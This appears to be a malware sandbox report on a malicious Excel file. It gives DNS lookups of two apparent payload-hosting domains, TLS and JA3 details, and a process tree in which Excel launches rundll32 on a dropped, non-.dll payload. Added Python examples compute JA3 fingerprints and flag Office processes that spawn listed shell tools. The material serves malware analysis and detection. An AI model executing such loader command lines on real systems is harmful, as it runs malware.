May 4, 2021 13:49:38.000962973 CEST | 8.8.8.8 | 192.168.2.22 | 0xfda2 | No error (0) | industrialarttextile.com | (none) | 192.254.233.89 | A (IP address) | IN (0x0001)
May 4, 2021 13:49:40.939656973 CEST | 8.8.8.8 | 192.168.2.22 | 0xd5c0 | No error (0) | anaheimdermatologists.com | (none) | 192.185.5.2 | A (IP address) | IN (0x0001)

                                                                                    HTTPS Packets

Both TLS sessions carry the same JA3 value. JA3 is computed from the ClientHello alone, so it fingerprints the client TLS stack on the analysis VM (192.168.2.22), not the servers; it is a pivot for "what client made these connections", not for the infrastructure.

Connection 1: server 192.254.233.89:443 to client 192.168.2.22:49165, May 4, 2021 13:49:38.410356045 CEST
  Leaf certificate: Subject CN=mail.gdmart.com.bd; Issuer CN=R3, O=Let's Encrypt, C=US; Not Before Wed Mar 10 10:47:11 CET 2021; Not After Tue Jun 08 11:47:11 CEST 2021
  Intermediate: Subject CN=R3, O=Let's Encrypt, C=US; Issuer CN=DST Root CA X3, O=Digital Signature Trust Co.; Not Before Wed Oct 07 21:21:40 CEST 2020; Not After Wed Sep 29 21:21:40 CEST 2021
  JA3 SSL client fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
  JA3 SSL client digest: 7dcce5b76c8b17472d024758970a406b
  Note: the name that resolved to this address was industrialarttextile.com, but the certificate served is for mail.gdmart.com.bd, which suggests a shared host with no certificate for the requested name; the download nevertheless proceeded (see the TCP packets on port 49165).

Connection 2: server 192.185.5.2:443 to client 192.168.2.22:49168, May 4, 2021 13:49:41.279311895 CEST
  Leaf certificate: Subject CN=cpcalendars.anaheimdermatologists.com; Issuer CN=R3, O=Let's Encrypt, C=US; Not Before Wed Mar 17 22:18:32 CET 2021; Not After Tue Jun 15 23:18:32 CEST 2021
  Intermediate: Subject CN=R3, O=Let's Encrypt, C=US; Issuer CN=DST Root CA X3, O=Digital Signature Trust Co.; Not Before Wed Oct 07 21:21:40 CEST 2020; Not After Wed Sep 29 21:21:40 CEST 2021
  JA3 SSL client fingerprint: 771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0
  JA3 SSL client digest: 7dcce5b76c8b17472d024758970a406b
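
The JA3 values in this table are derived from the ClientHello only, which is why both sessions share one digest. As an added example (not code from the report), the following builds a ClientHello from constructed bytes carrying exactly the version, cipher suites, extension list, supported groups and point formats of the fingerprint above, inserts GREASE values that the algorithm must drop, and parses the record back into the JA3 string and its MD5 digest. The SNI hostname and the signature-algorithm values are the example's own assumptions; the report lists 7dcce5b76c8b17472d024758970a406b as the digest of this string.

```python
"""Deriving a JA3 client fingerprint from a TLS ClientHello.

Added example; not code from the sandbox report. It serializes a ClientHello
(constructed bytes) whose fields match the report's JA3 string, adds GREASE
values that JA3 must ignore, then parses the record back to string and digest.
"""
import hashlib
import struct

# JA3 string as listed in the HTTPS Packets section of the report.
REPORT_JA3 = ("771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-"
              "49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0")
# GREASE values (RFC 8701) have the form 0x?a?a; JA3 drops them so they cannot perturb the hash.
GREASE = {0x0A0A + 0x1010 * i for i in range(16)}


def build_client_hello(version, ciphers, extensions):
    """Serialize a TLS record carrying a ClientHello; extensions = [(type, payload)]."""
    body = struct.pack(">H", version) + b"\x00" * 32 + b"\x00"   # version, random, empty session id
    body += struct.pack(">H", 2 * len(ciphers)) + b"".join(struct.pack(">H", c) for c in ciphers)
    body += b"\x01\x00"                                            # one compression method: null
    ext_blob = b"".join(struct.pack(">HH", t, len(p)) + p for t, p in extensions)
    body += struct.pack(">H", len(ext_blob)) + ext_blob
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body      # HandshakeType client_hello
    return b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake


def ja3_string(record: bytes) -> str:
    """Parse the ClientHello and return 'version,ciphers,extensions,groups,formats'."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a TLS handshake record carrying a ClientHello")
    hs_len = int.from_bytes(record[6:9], "big")
    b = record[9:9 + hs_len]
    version = struct.unpack(">H", b[:2])[0]
    pos = 2 + 32                                   # skip random
    pos += 1 + b[pos]                              # skip session id
    cs_len = struct.unpack(">H", b[pos:pos + 2])[0]; pos += 2
    ciphers = list(struct.unpack(">%dH" % (cs_len // 2), b[pos:pos + cs_len])); pos += cs_len
    pos += 1 + b[pos]                              # skip compression methods
    ext_types, groups, formats = [], [], []
    if pos < len(b):
        ext_len = struct.unpack(">H", b[pos:pos + 2])[0]; pos += 2
        end = pos + ext_len
        while pos + 4 <= end:
            t, l = struct.unpack(">HH", b[pos:pos + 4]); pos += 4
            p = b[pos:pos + l]; pos += l
            if t in GREASE:
                continue
            ext_types.append(t)
            if t == 10:    # supported_groups: u16 length, then u16 ids
                n = struct.unpack(">H", p[:2])[0] // 2
                groups = [g for g in struct.unpack(">%dH" % n, p[2:2 + 2 * n]) if g not in GREASE]
            elif t == 11:  # ec_point_formats: u8 length, then u8 ids
                formats = list(p[1:1 + p[0]])
    return ",".join([str(version),
                     "-".join(str(c) for c in ciphers if c not in GREASE),
                     "-".join(map(str, ext_types)),
                     "-".join(map(str, groups)),
                     "-".join(map(str, formats))])


def ja3_digest(s: str) -> str:
    """JA3 digest is the MD5 of the JA3 string."""
    return hashlib.md5(s.encode()).hexdigest()


def sample_client_hello() -> bytes:
    """ClientHello matching the report's JA3 string, plus one GREASE cipher, extension and group."""
    ciphers = [0x0A0A, 49192, 49191, 49172, 49171, 159, 158, 57, 51, 157, 156, 61, 60, 53, 47,
               49196, 49195, 49188, 49187, 49162, 49161, 106, 64, 56, 50, 10, 19]
    name = b"industrialarttextile.com"      # assumed SNI; taken from the report's DNS query
    sni = struct.pack(">H", len(name) + 3) + b"\x00" + struct.pack(">H", len(name)) + name
    extensions = [
        (0x1A1A, b""),                                      # GREASE extension, must be ignored
        (0, sni),                                           # server_name
        (10, struct.pack(">HHHH", 6, 0x2A2A, 23, 24)),      # groups: GREASE, secp256r1, secp384r1
        (11, b"\x01\x00"),                                  # point formats: uncompressed
        (13, struct.pack(">H", 4) + bytes([4, 1, 5, 1])),   # signature_algorithms (assumed values)
        (23, b""),                                          # extended_master_secret
        (65281, b"\x00"),                                   # renegotiation_info
    ]
    return build_client_hello(0x0303, ciphers, extensions)


if __name__ == "__main__":
    s = ja3_string(sample_client_hello())
    print(s)
    print(ja3_digest(s), "matches report:", s == REPORT_JA3)
```

The GREASE filtering is the part most home-grown JA3 implementations get wrong; without it, a browser that randomizes GREASE values produces a different digest on every connection and the fingerprint is useless for matching.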

                                                                                    Code Manipulations

                                                                                    Statistics

                                                                                    Behavior


                                                                                    System Behavior

                                                                                    General

                                                                                    Start time:13:49:39
                                                                                    Start date:04/05/2021
                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                    Imagebase:0x13f1c0000
                                                                                    File size:27641504 bytes
                                                                                    MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:13:49:47
                                                                                    Start date:04/05/2021
                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:rundll32 ..\jordji.nbvt1,DllRegisterServer
                                                                                    Imagebase:0xffb60000
                                                                                    File size:45568 bytes
                                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high

                                                                                    General

                                                                                    Start time:13:49:48
                                                                                    Start date:04/05/2021
                                                                                    Path:C:\Windows\System32\rundll32.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:rundll32 ..\jordji.nbvt11,DllRegisterServer
                                                                                    Imagebase:0xffb60000
                                                                                    File size:45568 bytes
                                                                                    MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
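
The process list above is the telemetry a detection engineer gets from endpoint logging: EXCEL.EXE starting rundll32 with a relative path to a file that has no .dll extension, and the DllRegisterServer export as entry point. As an added example (not part of the report), here is that detection logic written over constructed process-creation events that mirror this sample's command lines. The field names (Image, ParentImage, CommandLine) follow Sysmon event ID 1 and are an assumption about the log source; a benign Explorer-to-shell32.dll event is included so the rule's false-positive boundary is visible.

```python
"""Detection logic for Office applications launching rundll32 with a suspicious module.

Added example; not part of the sandbox report. The events below are constructed to
mirror the process tree in the System Behavior section (EXCEL.EXE starting
"rundll32 ..\\jordji.nbvt1,DllRegisterServer"); field names follow Sysmon event 1.
"""
import ntpath
import re
from dataclasses import dataclass

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe", "msaccess.exe"}
SHELL_LIKE = {"rundll32.exe", "regsvr32.exe", "mshta.exe", "wscript.exe", "cscript.exe",
              "powershell.exe", "cmd.exe", "certutil.exe"}
# "rundll32[.exe] <module>[,<entry>] ..." with an optionally quoted module argument.
RUNDLL32_ARGS = re.compile(r'rundll32(?:\.exe)?"?\s+("[^"]+"|[^\s,]+)(?:,(\S+))?', re.I)


@dataclass
class Finding:
    rule: str
    reason: str
    command_line: str


def parse_rundll32_target(cmdline: str):
    """Return (module, entrypoint) from a rundll32 command line, or None."""
    m = RUNDLL32_ARGS.search(cmdline)
    if not m:
        return None
    return m.group(1).strip('"'), m.group(2)


def is_relative_windows_path(path: str) -> bool:
    """True unless the path starts with a drive letter (C:\\) or a UNC prefix (\\\\)."""
    return not (re.match(r"^[A-Za-z]:\\", path) or path.startswith("\\\\"))


def check_event(ev: dict) -> list:
    """Apply both rules to one process-creation event."""
    findings = []
    image = ntpath.basename(ev["Image"]).lower()
    parent = ntpath.basename(ev["ParentImage"]).lower()
    cmd = ev["CommandLine"]
    # Rule 1: an Office process should not be spawning script hosts or LOLBins.
    if parent in OFFICE_APPS and image in SHELL_LIKE:
        findings.append(Finding("office_spawns_shell", f"{parent} started {image}", cmd))
    # Rule 2: rundll32 loading a module that is not a .dll or is addressed by relative path.
    if image == "rundll32.exe":
        target = parse_rundll32_target(cmd)
        if target:
            module, entry = target
            reasons = []
            if not module.lower().endswith(".dll"):
                reasons.append("module lacks .dll extension")
            if is_relative_windows_path(module):
                reasons.append("module given as relative path")
            if reasons:
                findings.append(Finding("rundll32_suspicious_module",
                                        "; ".join(reasons) + f" [{module},{entry or '?'}]", cmd))
    return findings


def evaluate(events) -> list:
    """Run every event through check_event and flatten the findings."""
    return [f for ev in events for f in check_event(ev)]


# Constructed events: the two rundll32 launches from the report, one Word-to-cmd case,
# and one benign rundll32 launch from Explorer that must not fire.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\jordji.nbvt1,DllRegisterServer"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL desk.cpl"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"ParentImage": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32 ..\jordji.nbvt11,DllRegisterServer"},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f"{f.rule}: {f.reason} :: {f.command_line}")
```

Rule 2 fires on its own, independent of the parent process, because the same relative-path, wrong-extension module pattern survives when the loader is moved one hop away (for example Excel starting cmd.exe which starts rundll32); keeping the two rules separate lets the second one catch that variant.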

                                                                                    Disassembly

                                                                                    Code Analysis
